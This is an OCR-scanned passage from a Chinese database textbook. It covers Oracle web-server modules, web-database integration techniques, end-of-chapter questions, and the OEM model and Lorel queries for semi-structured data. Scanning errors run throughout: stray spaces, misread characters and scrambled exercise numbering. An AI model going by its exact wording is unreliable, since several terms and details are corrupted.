的 开放 源 代 码 Web 服务 器 Apache HTTP Server 的 一 个 扩展 版 本 。 早 先 Oracle 使 用 它 自己 
的 应 用 服务 器 ， 但 是 现在 已 改 用 Apache 服务 器 技术 ， 因 为 Apache 服务 器 具有 良好 的 伸缩 
性 、 稳 定性 和 性 能 ， 以 及 可 以 通过 扩展 服务 模块 (mod) 进行 扩展 。 除 了 与 Apache HTTP 
Server 一 起 提供 的 已 编译 的 Apache 模块 之 外 ，Oracle 还 增强 了 这 些 模块 中 几 个 ， 添 加 了 一 
些 Oracle 专 有 模块 : 


mod_plsql: 把 对 存储 过 程 的 请 求 路 由 到 数据 库 服务 右上 。 

mod fastcgi : 对 标准 的 CGI 服务 提供 性 能 增强 ， 主 要 措施 是 在 先前 繁殖 的 进程 中 运 
行程 序 ， 而 不 是 每 次 开始 一 个 新 的 。 

mod_oradav : 提供 对 WebDAV ( Web Distributed Authoring and Versioning) 的 支持 ， 允 
许 用 户 发 布 和 管理 本 地 文件 系统 或 数据 库 中 的 内 容 。Oracle 数据 库 必须 具备 OraDAV 
驱动 程序 (一 个 存储 过 程 包 ) 以 供 mod_oradav 调用 ， 用 来 将 WebDAYV 的 活动 映射 为 
数据 库 的 活动 。 实 质 上 ，mod oradav 允许 WebDAV 客户 端 连接 Oracle 数据 库 ， 读 
写 其 内 容 ， 用 不 同 的 模式 查询 和 锁定 文档 。 

mod ossl : 支持 标准 S-HTTP， 使 用 Oracle 支持 的 公 钥 加 密 机 制 ， 在 20.5.6 节 讨 论 
过 的 SSL 层 (Secure Socket Layer， 安 全 套 接 层 ) 建立 安全 侦 听 连接 。 

mod osso : 支持 跨 所 有 OracleAS 组 件 的 透明 的 单一 签名 ，mod_ osso 检查 对 HTTP 
服务 器 的 请 求 ， 判 断 被 请 求 的 资源 是 否 被 保护 ， 如 果 是 ， 检 索 该 用 户 的 HTTP 服务 
多 cookie。 

mod_dms : 使 用 Oracle 动态 监控 服务 (Dynamic Monitoring Service，DMS ) 监控 站 
点 组 件 的 性 能 。 

mod_onsinit: 集成 Oracle 通知 服务 (Oracle Notification Service，ONS) 和 Oracle 进 
程 管理 及 通知 服务 器 (Oracle Process Manager and Notification，OPMN )。 
mod_wl_ohs : 人 允许 从 Oracle HTTP 服务 器 到 Oracle WebLogic 服务 器 的 请 求 被 代理 。 
该 组 件 功能 与 Apache HTTP 服务 器 的 Oracle WebLogic Server 插件 类 似 。 
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Oracle 提供 了 使 用 其 他 Web 服务 器 ， 如 IIS 的 代理 插件 。 

e JDeveloper : 支持 Java、XML、SQL、PL/SQL、HTML、JavaScript、BPEL 和 PHP 
等 的 免费 可 视 化 说 明 性 的 IDE。 它 覆盖 从 设计 到 编码 、 调 试 、 优 化 、 配 置 直至 部 署 
这 个 软件 开发 的 全 生命 周期 。 

e Application Development Framework (ADF): Java EE 应 用 程序 的 商业 可 视 化 、 说 明 

性 开发 环境 。ADF 基于 MVC 设计 模式 , 但 用 四 层 而 不 是 三 层 架 构 :( 1 ) 业务 服务 

层 , 负责 访 问 不 同 来 源 的 数据 并 处 理 业务 逻辑 ;( 2 ) 模型 层 ， 是 业务 服务 层 的 抽象 ， 

支持 视图 层 与 控制 层 以 一 致 的 方式 与 不 同 的 业务 服务 层 实现 进行 交互 ;( 3 ) 视图 层 ， 

负责 处 理应 用 用 户 接 口 ;( 4 ) 控制 器 ， 负 责 管 理应 用 流 ， 同 时 作为 视图 层 和 模型 层 

之 间 的 接口 。 

Java TV : 支持 面向 TV 的 Java 开发 以 及 多 媒体 客户 端 设 备 。 如 蓝光 磁盘 播放 器 、 电 

视 机 和 机 项 盒 。 

Java SDK: Java SE、Java ME 和 Java EE 的 开发 套件 。 

Oracle 表单 : 创建 基于 Oracle 数据 库 的 表单 。 

Oracle 报表 : 支持 用 户 开发 和 动态 创建 基于 Oracle 数据 库 的 报表 。 

Oracle Application Express ( Apex) : 以 前 被 称 为 HTML DB， 支 持 Web 应 用 程序 的 

快速 开发 ， 包 括 很 少 用 户 的 小 型 网 站 到 数 千 用 户 的 大 型 网 站 。 

e BI 发 布 者 : 支持 商务 智能 报表 的 创建 。 它 将 数据 的 创建 与 为 不 同 用 户 而 做 的 数据 格 
式 化 过 程 分 离开 来 。 该 引擎 可 以 格式 化 任何 良 构 的 XML 数据 ， 人 允许 与 任何 可 以 生成 
XML 数据 的 应 用 或 者 任何 通过 JDBC 即 可 用 的 数据 源 集成 。 此 外 ， 它 还 可 以 归并 不 
同 数据 源 到 单一 输出 文件 。 

e Oracle XML (XDK): 包含 支撑 XML 应 用 和 Web 站 点 的 组 件 库 和 实用 程序 。 

Oracle LDAP Developer's Kit : 包含 支持 客户 端 与 Oracle 网 络 目录 ( Oracle Internet 

Directory，OID) 交互 的 组 件 ， 这 样 可 以 开发 和 监控 启用 了 LDAP 的 应 用 程序 ， 实 现 

客户 端 对 目录 服务 的 调用 、 加 密 连 接 和 对 目录 数据 的 管理 。 


本 章 小 结 


Internet 是 全 球 互联 计算 机 网 络 的 集合 。 万 维 网 是 一 种 基于 超 媒 体 的 系统 ， 它 提供 了 一 种 以 无 序 方 

式 访问 Internet 上 信息 的 简单 方式 。Web 上 的 信息 使 用 HTML ( 超 文本 标记 语言 ) 编写 的 文档 进行 

存储 ， 由 Web 浏览 器 来 显示 。Web 浏览 器 通过 HTTP ( 超 文本 传输 协议 ) 与 Web 服务 器 进行 信息 

交换 。 

近年 来 Web 服务 在 为 整合 不 同 种 类 的 应 用 而 建立 应 用 程序 和 商业 流程 的 方面 树立 了 重要 的 范例 。 

Web 服务 是 “用 XML 编写 的 、 小 型 可 重用 的 应 用 程序 ， 它 们 允许 数据 跨 Internet 或 者 局 域 网 在 非 

连通 源 之 间 进 行 交换 ”。Web 服务 这 种 方法 的 核心 是 那些 广 为 接 受 的 技术 和 广泛 使 用 的 标准 ， 如 

XML 、SOAP、WSDL 和 UDDI。 

以 Web 作为 数据 库 平台 的 优点 包括 : 用 DBMS 的 优势 、 简 单 性 、 平 台 无 关 性 、GUI、 标 准 化 、 跨 
台 支 持 、 透 明 网 络 访问 和 可 伸缩 配置 等 。 缺 点 包括 : 缺乏 可 靠 性 、 安 全 性 差 、 费 用 昂贵 、 可 伸缩 

性 差 、 HTML 的 功能 有 限 、 无 状态 、 带 宽 受 限 、 性 能 不 足 和 不 完善 等 。 

JavaScript 和 VBScript 等 脚本 语言 可 以 用 来 扩展 浏览 器 和 服务 器 功能 。 脚 本 语言 允许 创 建 庶 和 人 到 

HTML 中 的 功能 。 可 以 使 用 标准 的 编程 逻辑 进行 编程 ， 比 如 循环 、 条 件 语 句 和 算术 运算 。 
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公共 网 关 接口 (CGI) 是 在 Web 服务 器 和 CGI 脚本 之 间 进 行 信息 传递 的 一 种 规范 。 它 是 一 种 集成 
Web 和 数据 库 的 流行 技术 。 它 的 优点 包括 : 简单 、 语 言 独立 性 、Web 服务 器 独立 性 和 广泛 被 使 用 。 
它 的 缺点 主要 来 自 这样 一 个 事实 ， 为 每 一 个 CGI 脚本 的 启动 都 要 创建 一 个 进程 ， 这 就 会 在 高 峰 期 加 
重 Web 服务 器 的 负担 。 

另外 一 种 替代 CGI 的 方法 就 是 扩展 Web 服务 器 ， 典 型 的 技术 包括 Netscape API (NSAPI) 和 
Microsoft Internet IIS API (ISAPI) 。 附 加 的 功能 通过 API 连接 到 服务 器 。 尽 管 它 可 提供 增强 的 功能 
和 性 能 ， 但 是 否 能 真正 做 到 这 一 点 ， 某 种 程度 上 要 取决 于 开发 人 员 正确 的 编程 实现 。 

Java 是 Sun 推出 的 一 种 简单 的 、 面 向 对 象 的 、 分 布 式 的 、 解 释 型 的 、 健 壮 的 、 安 全 的 、 体 系 结构 中 
立 的 、 可 移植 的 、 高 性 能 的 、 多 线程 的 、 动 态 的 语言 。Java 应 用 程序 被 编译 成 字 节 代码 ， 然 后 由 Java 
虚拟 机 解释 执行 。Java 可 以 通过 JDBC、SQLJ、CMP、JDO 或 JPA 连接 到 ODBC 兼容 的 DBMS 上 。 
Microsoft 的 开发 数据 库 互 连 ( Open Database Connectivity，ODBC) 技术 提供 了 访问 不 同 种 类 的 SQL 
数据 库 的 通用 接口 ，Microsoft 最 终 用 数据 访问 对 象 (Data Access Objects，DAO) 封装 了 Access 
和 Visual C++。DAO 的 对 象 模型 由 诸如 Databases、TableDefs、QueryDefs 、Recordsets 、fields 和 
properties 等 对 象 构成 。Microsoft 在 OLE DB 之 后 引入 了 远程 数据 对 象 (Remote Data Objects ，RDO ) 
技术 ， 它 提供 对 任意 数据 源 的 低层 访问 。 随 后 Microsoft 开发 了 ADO ( ActiveX Data Objects) 作为 
ASP 在 数据 库 连 通 性 方面 的 编程 扩展 ,为 OLE DB 提供 易于 使 用 的 API。 

Microsoft 当前 以 及 下 一 步 关 于 Web 的 解决 策略 是 Microsoft .NET 的 开发 。 该 平台 已 经 具有 各 种 工 
具 、 服 务 和 技术 ， 如 Windows Server、BizTalk Server、Commerce Server、Application Center、Mobile 
Information Server、SQL Server (一 个 对 象 关 系 DBMS) 和 Microsoft Visual Studio .NET。 另 外 还 有 
Microsoft .NET 框架， 由 通用 语言 运行 环境 (CLR) 和 .NET 框架 类 库 组 成 。 

CLR 是 用 来 装载 、 运 行 和 管理 代码 的 执行 引擎 ， 这 些 代码 已 经 被 编译 成 中 间 字 节 码 的 形式 ， 称 为 
Microsoft Intermediate Language (MSIL) 或 与 Java 字 节 码 类 似 的 简单 的 苇 。 不 过 ， 这 些 代 码 不 是 被 
解释 ， 而 是 先 编译 成 本 地 的 二 进 制 格式 ， 然 后 由 及 时 (just-in-time) 编译 器 执行 生成 CLR。CLR 多 
许 一 种 语言 调用 另 一 种 语言 ， 甚 至 能 继承 和 修改 用 其 他 语言 编写 的 对 象 。.NET 框架 类 库 是 由 可 重 
用 类 、 接 口 和 与 CLR 整合 了 的 类 型 构成 的 集 。ADO.NET 是 ADO 的 下 一 个 版 本 ， 为 程序 员 的 数据 
访问 服务 提供 了 许多 新 的 类 。ADO.NET 是 .NET 的 框架 的 一 个 组 件 ， 解决 了 ADO 的 三 个 弱点 : 提 
供 了 网 络 环境 需要 的 非 连通 数据 访问 ;提供 了 与 .NET 框架 类 库 的 兼容 性 ; 提供 了 对 XML 的 广泛 
支持 。 

混合 中 间 件 (Oracle Fusion Middleware)， 目 的 是 专门 提供 分 布 环境 的 扩展 性 。 它 是 一 个 n 层 结构 ， 
基于 若干 工业 标准 ， 如 HTTP 以 及 支持 Web 的 HTML/XML、Java、J2EE、 企 业 JavaBeans ( EJB)， 
用 于 数据 库 连接 的 JDBC 和 SQLJ，Java servlet 和 JavaServer Pages (JSP)、OMG 的 CORBA 技术 、 
用 于 对 象 互 操作 的 Internet Inter-Object Protocol (IIOP) 和 Remote Method Invocation ( RMI)。 它 还 
支持 Java Messaging Service ( JMS)、Java Naming and Directory Interface ( JNDI) 以 及 使 用 Java 编 
写 存储 程序 。 


思考 题 

29.1 解释 下 列 术语 : 

(a) Internet、 企 业内 联网 和 企业 外 联网 
(b) World Wide Web 

(c) 超 文本 传输 协议 (HTTP) 
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29.3 
29.4 
29.5 
29.6 


29.7 
29.8 
29.9 
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(d) 超 文本 标记 语言 (HTML) 

(e) 统一 资源 定位 符 (URL) 

什么 是 Web 服务 ? 给 出 一 些 实例 。 

讨论 Web 作为 数据 库 平台 的 优 缺 点 。 

描述 将 数据 库 集成 到 Web 的 方法 一 一 公共 网 关 接 口 和 服务 器 扩展 。 
描述 一 下 如 何 使 用 cookie 存储 用 户 信息 。 
讨论 以 下 方法 : 

(a) 容器 管理 持久 性 CMP 

(b) Bean 管理 持久 性 BMP 

(c) JDBC 

(d) SQLJ 

(e) JDO 

(f) JPA 

讨论 ASP 和 JSP 的 区 别 。 

讨论 ADO 记录 集 和 ADO.NET 数据 集 的 区 别 
讨论 Oracle 的 Web 平台 的 组 件 。 


习题 


29.10 


29.1] 


全 
29.13 
29.14 
29.15 
29.16 
29.17 
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分 析 你 目前 使 用 的 DBMS 所 提供 的 Web 功能 。 将 你 的 系统 功能 与 29.3 节 至 29.9 节 所 讨论 方法 


的 功能 比较 。 


分 析 你 的 DBMS 的 Web 接口 所 提供 的 安全 特性 。 说 明 这 些 特性 和 29.2.6 节 所 讨论 的 特性 的 


区 别 。 

使 用 一 种 Web-DBMS 集成 方案 ， 创 建 一 系列 表 来 显示 DreamHome 案例 的 基本 表 。 
扩展 习题 29.12 的 实现 使 得 基本 表 能 够 从 Web 浏览 器 上 进行 更 新 。 

创建 网 页 用 来 显示 执行 附录 A 所 给 出 的 DreamHome 案例 查询 返回 的 结果 。 

对 Wellmeadows 案例 重复 习题 29.12~29.14。 

创建 网 页 显示 第 6 章 习 题 6.7~6.28 给 出 的 查询 结果 。 

使 用 任意 Web 浏览 器 ， 浏 览 下 面 列 出 的 一 些 网 址 ， 并 查看 其 中 给 出 的 信息 : 


(a) W3C http://www.w3.org 

(b) Microsoft http://www.microsoft.com 
(c) Oracle http://www.oracle.com 
(d) IBM http://www.ibm.com 

(e) Sun (Java) http://java.sun.com 

(f) WS-I http://www.oasis-ws-i.org/ 
(g) JIDOCentral http://db.apache.org/jdo/jdocentral.html 
(h) OASIS http://www.oasis-open.org 
(i) XML.com http://www.xml.com 

(j) Gemstone http://www.gemstone.com 
(k) Objectivity http://www.objectivity.com 


(1) ObjectStore http://www.objectstore.net 
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(m) ColdFusion http://www.adobe.com/products/coldfusion/ 
(n) Apache http://www.apache.org 
(0) mySQL http://www.mysql.com 
(p) PostgreSQL http://www.postgresql.com 
(q) Perl http://www.perl.com 
(r) PHP http://www.php.net 
DreamHome 的 主管 经 理 要 求 你 调查 并 提交 一 份 关于 DreamHome 数据 库 如 何 支 持 Internet 访问 


的 可 行 性 报告 。 报 告 应当 分 析 技术 问题 ， 提 出 技术 解决 方案 ， 分 析 该 方案 的 优 缺 点 ， 以 及 任何 
你 认识 到 的 问题 。 报 告 应 当 附 上 关于 该 提议 的 经 过 论证 的 可 行 性 分 析 结果 。 
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半 结 构 化 数据 与 XML 








本 章 我 们 主要 学 习 : 
什么 是 半 结 构 化 数据 
一 种 半 结 构 数据 的 模型 一 一 对 象 交 换 模型 (OEM) 的 概念 
Lore (一 种 半 结 构 化 DBMS) 及 其 查询 语言 Lorel 
XML 的 主要 语言 要 素 
合式 与 合法 的 XML 文档 之 区 别 
如 何 用 文档 类 型 定义 (DTD) 来 定义 XML 文档 的 语法 
文档 对 象 模型 (DOM) 与 OEM 之 比较 
其 他 一 些 与 XML 相关 的 技术 ， 如 命名 空间 、XSL 和 XSLT、XPath、XPointer、XLink、 
XHTML 、SOAP、WSDL 以 及 UDDI 
DTD 的 缺陷 ， 以 及 W3C 的 XML Schema 如 何 弥 补 这些 缺 陷 
RDF 和 RDF 模式 如 何 提供 处 理 元 数据 的 基础 
W3C 查询 语言 
如 何 将 XML 映射 到 数据 库 
新 的 SQL: 2011 标准 如 何 支 持 XML 
Oracle 对 XML 的 支持 


尽管 W3C (World Wide Web Consortium ， 万 维 网 协议 ) 1998 年 才 和 颁布 XML 1.0 标准 ， 
但 XML 已 使 计算 发 生 了 巨大 的 变革 。 作 为 一 种 技术 ， 它 对 程序 设计 的 各 个 方面 都 有 影响 ， 
包括 图 形 接口 、 榜 入 式 系 统 、 分 布 式 系统 ， 其 至 本 书 讨论 的 数据 库 管 理 。 可 以 说 ,， XML 已 
经 成 为 了 软件 行业 数据 交换 的 事实 标准 ， 它 迅速 取代 了 EDI ( Electronic Data Interchange， 
电子 数据 交换 ) 系统 并 作为 业界 数据 交换 的 主要 媒介 。 一 些 分析 家 预言 ， 无 论 是 在 线 还 是 离 
线 Internet，XML 都 将 成 为 创建 和 存储 大 多 数 文档 的 语言 。 

Web 上 的 信息 的 本 质 特征 以 及 XML 的 固有 灵活 性 决定 了 大 部 分 以 XML 编码 的 数据 
都 将 是 半 结 构 化 的 ， 即 数据 可 能 是 不 规则 和 不 完整 的 ， 并 且 它 们 的 结构 迅速 改变 ， 无 法 
预计 。 遗 憾 的 是 ， 关 系 、 面 向 对 象 和 关系 对 象 数 据 库 管理 系统 (DBMS) 并 不 能 很 好 地 处 
理 这 种 特性 。 在 XML 问世 以 前 ， 人 们 就 对 半 结 构 化 数据 表现 出 了 强烈 兴趣 并 且 这 种 兴趣 
与 日 俱 增 。 本 章 将 介绍 半 结 构 化 数据 并 讨论 XML 的 一 些 相关 技术 ， 尤 其 是 XML 的 查询 


语言 。 





在 30.1 节 ， 将 介绍 半 结 构 化 数据 并 讨论 它 的 一 种 模型 一 对 象 交 换 模 型 (OEM)， 还 将 
简要 介绍 一 种 示例 性 的 半 结 构 化 数据 的 DBMS : Lore 及 其 查询 语言 Lorel。 在 30.2 节 ， 将 
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讨论 XML， 并 分 析 XML 如 何 演变 成 为 Web 上 数据 表现 和 数据 交换 的 一 种 标准 。30.3 节 将 
介绍 一 些 相关 的 XML 技术 ， 比 如 命名 空间 、XSL、XPath 、XPointer 及 XLink，30.4 节 将 
讨论 XML Schema 如 何 用 来 定义 XML 文档 的 内 容 模 型 ， 以 及 资源 描述 框架 (RDF) 如 何 
提供 交换 元 数据 的 框架 。 在 30.5 节 将 介绍 被 称 为 XQuery 的 XML 的 W3C 查询 语言 。30.6 
节 将 讨论 XML 如 何 存 入 和 从 数据 库 检 出 ， 该 节 同 时 还 讨论 SQL:2011 对 XML 的 支持 。 最 
后 在 30.7 节 将 简要 讨论 Oracle 对 XML 的 支持 。 本 章 示 例 取 自 11.4 节 和 附录 A 中 描述 的 
DreamHome 案例 。 


30.1 半 结 构 化 数据 


| 半 结 构 化 数据 | 结构 易 变 、 不 可 预见 且 可 能 不 规则 、 不 完整 的 数据 。 


半 结 构 化 数据 具有 一 些 结构 ， 但 是 结构 不 严格 、 不 规则 、 不 完整 。 通 常 而 言 ， 数 据 并 不 
符合 固定 的 模式 (有 时 ， 用 术语 “无 模式 ”或 “ 自 描述 ”来 描述 这 类 数据 )。 在 半 结 构 化 数 
据 中 ， 与 模式 相关 的 信息 包含 在 数据 里 面 。 一 些 形 式 的 半 结 构 化 数据 没有 单独 的 模式 ， 另 一 
些 即 使 有 ， 对 数据 的 约束 也 很 松散 。 相 比 之 下 ， 关 系 DBMS 需要 一 个 预定 义 的 面向 表 的 模 
式 ， 并 且 这 个 系统 管理 的 所 有 数据 都 要 遵循 这 个 结构 。 而 面向 对 象 DBMS 虽 比 关系 DBMS 
的 结构 更 加 丰富 ， 但 它们 仍然 需要 与 预定 义 的 模式 保持 一 致 。 然 而 ， 在 基于 半 结 构 化 数据 的 
DBMS 中 ， 模 式 是 由 数据 生成 的 ， 而 不 是 预先 强加 的 。 

由 于 各 种 原因 ， 半 结构 化 数据 近 些 年 来 变 得 越 来 越 重要 ， 人 们 对 它 感 兴趣 的 主要 原因 
在 于 : 

e 人 们 和 希望 能 像 对 待 数据 库 一 样 去 对 待 Web 资源 ， 但 却 不 能 用 一 种 模式 去 约束 这 些 资源 。 

e 人 们 希望 能 用 一 种 更 灵活 的 格式 在 不 同 的 数据 库 之 间 进 行 数据 交换 。 

e XML 作为 一 种 基于 Web 的 数据 表示 和 数据 交换 标准 出 现 了 ， 同 时 XML 文档 与 半 结 

构 化 数据 具有 相似 性 。 

管理 大 多 数 半 结 构 化 数据 的 方法 是 使 用 基于 遍历 标记 树 的 查询 语言 。 半 结构 化 数据 没有 
单一 的 模式 ， 只 能 够 在 收集 时 通过 它 的 位 置 确定 ， 而 不 是 通过 它 的 结构 化 属性 来 确定 。 这 意 
味 着 查询 丧失 了 它 传统 的 自然 说 明 性 ， 并 且 变 得 更 具有 导航 性 。 下 面 用 一 个 示例 来 说 明 一 个 
半 结 构 化 数据 系统 需要 处 理 的 数据 类 型 。 


| 例 30.1 3》》 半 结构 化 数据 的 示例 
考虑 图 30-1 描述 的 DreamHome 案例 的 部 分 结构 。 图 30-2 用 图 形 对 数据 进行 了 描述 。 
数据 描述 了 一 个 分 公司 ( 22 Deer Rd)、 两 名 员工 (John White 和 Ann Beech)、 两 处 待 租房 
产 (2 Manor Rd 和 18 Dale Rd) 以 及 数据 之 间 的 一 些 联 系 。 尤 其 要 说 明 的 是 ， 数 据 不 是 完 
全 规则 的 。 
e@ 对 于 John White， 分 别 存 了 姓 和 名 ， 但 Ann Beech 的 姓名 作为 一 个 整体 存储 ， 此 外 
还 存 了 工资 。 
e 对 于 位 于 2 Manor Rd 的 房产 存储 的 是 月 租金 ， 而 位 于 18 Dale Rd 的 房产 存储 的 是 年 
租金 。 
e@ 对 于 位 于 2 Manor Rd 的 房产 的 类 型 (公寓 ) 存储 为 字符 串 ， 而 位 于 18 Dale Rd 的 房 
产 的 类 型 (别墅 ) 存储 为 整数 。 
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图 30-1 DreamHome 数据 库 中 的 半 结 构 化 数据 实例 


DreamHome 





图 30-2 图 30-1 中 数据 的 图 形 表 示 .4 


30.1.1 对象 交换 模型 


对 象 交换 模型 ( Object Exchange Model，OEM) 是 半 结 构 化 数据 的 推荐 模型 之 一 。 它 是 
一 种 柑 套 的 对 象 模 型 ， 其 设计 原本 是 针对 TSIMMIS ( Stanford-IBM 提出 的 一 种 复杂 信息 资 
源 管理 标准 ) 工程 ， 目 的 是 为 了 支持 来 自 不 同 数据 源 数 据 的 集成 ( Papakonstantinous 等 人 ， 
1995 )。OEM 中 的 数据 是 自 描述 和 无 模式 的 ， 能 被 看 作 一 个 带 标记 的 有 向 图 ， 其 中 的 结 点 
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是 对 象 (如 图 30-2 所 示 )。 

OEM 的 每 个 对 象 都 包含 唯一 的 对 象 标 识 符 (例如 ，&7 )、 说 明 性 文本 标记 ( street)、 类 
型 (string) 和 值 (“22 Deer Rd”)。 对 象 可 以 分 为 原子 的 和 复合 的 。 原 子 对 象 具有 基本 类 型 
(如 整 型 或 字符 串 型 ) 的 值 ， 并 且 在 图 中 被 显示 为 一 个 没有 出 边 的 结 点 。 其 他 对 象 称 为 复合 
对 象 ， 它 的 类 型 是 对 象 标 识 符 的 集合 ,在 图 中 被 显示 为 有 一 个 或 多 个 出 边 的 结 点 。 一 个 复合 
的 OEM 对 象 可 以 是 任意 个 OEM 子 对 象 的 父 对 象 ， 一 个 OEM 对 象 也 可 以 拥有 多 个 父 对 象 ， 
允许 建 模 表示 数据 间 任 意 复杂 的 联系 。 

标记 (label) 指出 对 象 代表 了 什么 ， 还 可 用 来 区 分 不 同 的 对 象 并 说 明 对 象 的 含义 (这 
就 是 OEM 被 称 为 自 描述 的 原因 )， 因 此 应 该 尽量 包含 信息 。 标 记 可 以 动态 改变 。 名 字 
(name) 是 一 种 特殊 的 标记 ， 它 可 作为 单个 对 象 的 别名 ,还 可 以 作为 数据 库 的 入 口 点 (例如 ， 
DreamHome 就 是 对 象 &1 的 名 字 )。 

一 个 OEM 对 象 可 以 看 作 四 元 组 (label、oid、type、value)。 例 如 ，Staff 对 象 &4 包含 
name 和 salary，name 对 象 &9 包含 字符 串 “ Ann Beech”，salary 对 象 &10 包含 十 进 制 值 
12000， 可 表示 为 : 


{Staff, &4, set, {&9, 8&10}} 
{name, &9, string, “Ann Beech”} 
{salary, &10, decimal, 12000} 


由 此 可 见 OEM 可 专门 用 来 处 理 数 据 的 不 完整 性 ， 以 及 结构 和 类 型 的 不 规则 性 。 


30.1.2 Lore 和 Lorel 


开发 半 结 构 化 数据 的 DBMS 可 以 用 许多 不 同 的 方法 。 一 些 是 构建 在 关系 DBMS 之 上 ， 
另 一 些 是 构建 在 面向 对 象 DBMS 之 上 。 本 节 将 简要 地 查看 一 个 处 理 半 结 构 化 数据 的 特殊 的 
DBMS 一 一 Lore ( Lightweight Object REpository)， 该 系统 由 美国 斯 坦 福 大 学 开发 ( McHugh 
等 人 ，1997 )。 有 趣 的 是 ，Lore 早 在 XML 发 展 初期 就 开发 了 , 但 其 对 象 模 型 和 查询 语言 与 
专 为 XML 产生 的 查询 语言 非常 相似 9。 

Lore 是 多 用 户 DBMS， 支 持 故 障 恢复 、 视 图 物化 、 某 种 标准 形式 (支持 XML) 文件 的 
批量 装载 和 说 明 性 修改 语言 。Lore 还 有 一 个 外 部 数据 管理 器 ， 在 查询 过 程 中 ， 该 管理 器 可 
以 动态 地 获取 外 部 数据 源 的 数据 ， 并 与 本 地 的 数据 相 结合 。 

与 Lore 相关 的 是 Lorel (Lore 语言 )， 它 对 28.2.4 节 讨 论 过 的 面向 对 象 查询 语言 进行 了 
扩展 (Abiteboul 等 人 ，1997 )。Lorel 试图 处 理 下 列 情形 的 查询 : 

e 返回 有 意义 的 结果 ， 即 使 缺失 了 某 些 数据 。 

。 在 单 值 和 集合 值 上 操作 一 致 。 

。 在 不 同类 型 的 数据 上 操作 一 致 。 

e 返回 异 构 对 象 。 

e 对 象 结构 不 完全 确定 的 。 

Lorel 支持 说 明 性 的 路 径 表 达 式 ， 路 径 表 达 式 用 来 遍历 图 结构 ， 以 及 自动 处 理 异 构 和 无 
类 型 的 数据 。 一 个 路 径 表 达 式 实质 上 是 一 个 边 标 记 序列 ( L1.L2...Ln)， 对 于 给 定 的 结 点 该 序 
列 产生 一 组 结 点 。 例 如 ， 对 于 图 30-2 中 路 径 表 达 式 DreamHome.PropertyForRent 产生 一 组 


日 ”Lore 后 来 进行 了 改进 以 处 理 XML (Goldman 等 人 ，1999 ) 
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结 点 {&5，&6}。 第 二 个 例子 ， 路 径 表 达 式 DreamHome.PropertyForRent.street 产生 包含 字 
符 串 {“2 Manor Rd”,“18 Dale Rd” } 的 一 组 结 点 。 

Lorel 也 支持 提供 任意 路 径 的 通用 路 径 表 达 式 : 符号 “ |” 表示 选择 ， 符 号“? ”表示 零 
或 一 次 出 现 ， 符 号 “十 ”表示 一 次 或 多 次 出 现 ， 符 号 “* ”表示 零 或 多 次 出 现 。 例 如 ， 路 径 
DreamHome. ( Branch | PropertyForRent) .street 表示 一 个 以 DreamHome 开始 的 路 径 ， 后 面 
跟着 一 个 Branch 边 或 者 一 个 PropertyForRent 边 ， 然 后 紧 接 着 是 一 个 street 边 。 当 查询 半 结 
构 化 数据 时 ， 我 们 有 可 能 只 知道 一 部 分 对 象 的 标记 ， 并 且 这 些 标 记 间 的 相对 顺序 也 可 能 不 
完全 知道 。 为 了 支持 这 种 情况 下 的 查询 ，Lorel 支持 通配符 的 概念 :“% ”在 一 个 标识 符 里 
代表 零 或 更 多 的 字符 ,“#” 是 (%) * 的 缩写 。 例 如 : DreamHome.#.street 路 径 表 示 任 意 以 
DreamHome 开头 且 以 street 边 结 尾 的 ， 其 间 含 任意 边 序列 的 路 径 。 若 使 用 UINX 的 实用 程 
序 grep 的 文法 ， 可 以 表示 更 为 复杂 的 路 径 。 比 如 ， 下 列 是 一 般 的 路 径 表达 式 : 


DreamHome.#. (name | name…[fF]Name”) 


这 个 表达 式 匹 配 一 个 以 DreamHome 开始 ， 以 name 边 或 者 name 边 后 跟 大 写 的 fName 
边 结束 的 任意 路 径 。 
Lorel 与 SQL 的 思想 有 很 多 相似 的 地 方 ， 因 此 Lorel 的 查询 形式 是 : 


SELECT a FROMb WHERE p 


变量 a 是 希望 看 到 的 返回 数据 ， 变 量 b 表示 和 希望 查询 的 数据 集 ，p 是 用 来 限制 数据 集 
的 谓词 。 在 没有 通配符 的 情况 下 ，FROM 是 可 选 和 多 余 的 ， 因 为 每 一 个 路 径 表 达 式 都 会 以 
FROM 子 句 中 提 到 的 一 个 对 象 作 为 起 始 。 下 面 ， 使 用 例子 30.1 中 的 数据 ， 提 供 了 一 些 Lorel 
的 示例 。 


| 例 30.2 》》Lorel 查询 示例 
( 1) 查询 由 Ann Beech 经 管 的 房产 。 


SELECT s.Oversees 
FROM DreamHome.Staff s 
WHERE s.name =“Ann Beech” 


FROM 子 旬 中 的 数据 集 包 含 对 象 &3 和 区 4。WHERE 子 名 的 应 用 将 该 数据 集 限 制 到 对 
象 &4 上 。 然 后 对 其 应 用 SELECT 子 句 ， 获 取 想 要 的 结果 ， 在 这 个 案例 中 是 : 


Answer 

PropertyForRent &5 
street &11 “2 Manor Rd” 
type &12 “Flat” 
monthlyRent &13 375 
OverseenBy &4 

PropertyForRent &6 
street &14 “18 Dale Rd” 
type &15 1 
annualRent &16 7200 
OverseenBy &4 


结果 封装 在 含有 默认 标记 Answer 的 一 个 复合 对 象 中 。Answer 对 象 变 成 了 一 个 数据 库 
中 新 的 对 象 ， 它 可 以 在 通常 路 径 下 被 查询 到 。 由 于 查询 中 没有 使 用 任何 通配符 ， 因 此 不 使 用 
FROM 子 旬 也 可 以 表示 这 个 查询 。 
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(2 ) 查询 所 有 给 出 了 年 租金 的 房产 。 

SELECT DreamHome.PropertyForRent 

WHERE DreamHome.PropertyForRent.annualRent 

这 个 查询 可 以 通过 对 annualRent 边 (DreamHome. PropertyForRent.annualRent) 的 检查 
来 实现 ， 而 不 使 用 FROM 子 句 。 下 面 是 这 个 查询 返回 的 结果 : 


Answer 
PropertyForRent &6 
street &14 “18 Dale Rd” 
type &15 1 
annualRent &16 7200 
OverseenBy &4 


(3 ) 查询 经 管 两 处 以 上 房产 的 所 有 员工 。 


SELECT DreamHome.Staff.Name 
WHERE DreamHome.Staff SATISFIES 
2 <= COUNT (SELECT DreamHome.Staff 
WHERE DreamHome.Staff.Oversees) 

Lorel 支持 标准 SQL 聚集 函数 (COUNT，SUM，MIN，MAX，AVG)， 并 且 允 许 在 
SELECT 和 WHERE 子 句 中 使 用 函数 。 在 该 查询 中 ，WHERE 子 名 使 用 了 聚集 函数 COUNT。 
下 面 是 这 次 查询 返回 的 结果 : 

Answer 

name &9 “Ann Beech” 《< 


数据 向 导 

知晓 数据 库 结构 对 于 建立 一 个 有 意义 的 查询 非常 重要 。 同 样 ， 执 行 一 个 高 效 的 查询 ,一 
